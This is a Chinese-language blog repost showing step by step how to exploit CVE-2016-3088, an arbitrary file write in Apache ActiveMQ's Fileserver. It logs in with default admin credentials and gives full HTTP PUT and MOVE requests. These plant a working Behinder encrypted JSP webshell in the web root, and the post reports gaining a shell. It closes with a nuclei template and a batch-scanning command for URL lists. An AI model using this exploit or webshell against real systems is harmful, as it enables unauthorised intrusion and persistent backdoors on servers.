本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现 CVE-2016-3088 任意文件写入漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
Apache ActiveMQ是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持Java消息服务、集群、Spring框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。
此漏洞出现在Fileserver应用程序中,该漏洞的原理实际上非常简单,即文件服务器支持写入文件(但不解析JSP),同时支持移动文件(MOVE请求)。因此,我们只需要编写一个文件,然后使用移动请求将其移动到任何位置,就会导致任意文件写入漏洞。
![图片[1]-CVE-2016-3088 任意文件写入漏洞-安全小天地](d2b5ca33bd141633.png)
0x03 漏洞复现
漏洞版本:
- ActiveMQ在5.14.0之前的版本(不包括5.14.0)
1.默认密码admin:admin登录,并且在fileserver目录使用put方法上传ry.txt冰蝎马,回显204证明上传成功(注意要加Authorization:认证参数)
PUT /fileserver/ry.txt HTTP/1.1
Host: x.x.x.x:64252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: 3PNB_2132_saltkey=LM0s1m1l; 3PNB_2132_lastvisit=1652362564
Upgrade-Insecure-Requests: 1
Content-Length: 612
<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>![图片[2]-CVE-2016-3088 任意文件写入漏洞-安全小天地](https://img.godyu.com/2023/12/20231226125102236.png?imageView2/0/format/webp/q/75)
2. 通过MOVE方法移动ry.txt冰蝎马到api页面的ry.jsp文件中
MOVE /fileserver/ry.txt HTTP/1.1
Host: x.x.x.x:64252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Destination: file:///opt/activemq/webapps/api/ry.jsp
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: 3PNB_2132_saltkey=LM0s1m1l; 3PNB_2132_lastvisit=1652362564
Upgrade-Insecure-Requests: 1![图片[3]-CVE-2016-3088 任意文件写入漏洞-安全小天地](https://img.godyu.com/2023/12/20231226205103770.png?imageView2/0/format/webp/q/75)
3. 冰蝎连接,得到一个shell
![图片[4]-CVE-2016-3088 任意文件写入漏洞-安全小天地](https://img.godyu.com/2023/12/20231226205104640.png?imageView2/0/format/webp/q/75)
4.nuclei已经集成该漏洞脚本(nuclei稳定快,编写poc简单,有社区维护,推荐使用)
nuclei下载地址:https://github.com/projectdiscovery/nuclei
批量验证命令:
nuclei -t cves/2016/CVE-2016-3088.yaml -list urls.txt
yaml POC:
id: CVE-2016-3088
info:
name: Apache ActiveMQ Fileserver - Arbitrary File Write
author: fq_hsu
severity: critical
description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
reference:
- https://www.exploit-db.com/exploits/40857
- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
- http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
- https://nvd.nist.gov/vuln/detail/CVE-2016-3088
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-3088
cwe-id: CWE-20
tags: fileupload,cve,cve2016,apache,activemq
requests:
- raw:
- |
PUT /fileserver/test.txt HTTP/1.1
Host: {{Hostname}}
{{randstr}}
- raw:
- |
GET /fileserver/test.txt HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- \"status_code_1==204\"
- \"status_code_2==200\"
- \"contains((body_2), \'{{randstr}}\')\"
condition: andTHE END
暂无评论内容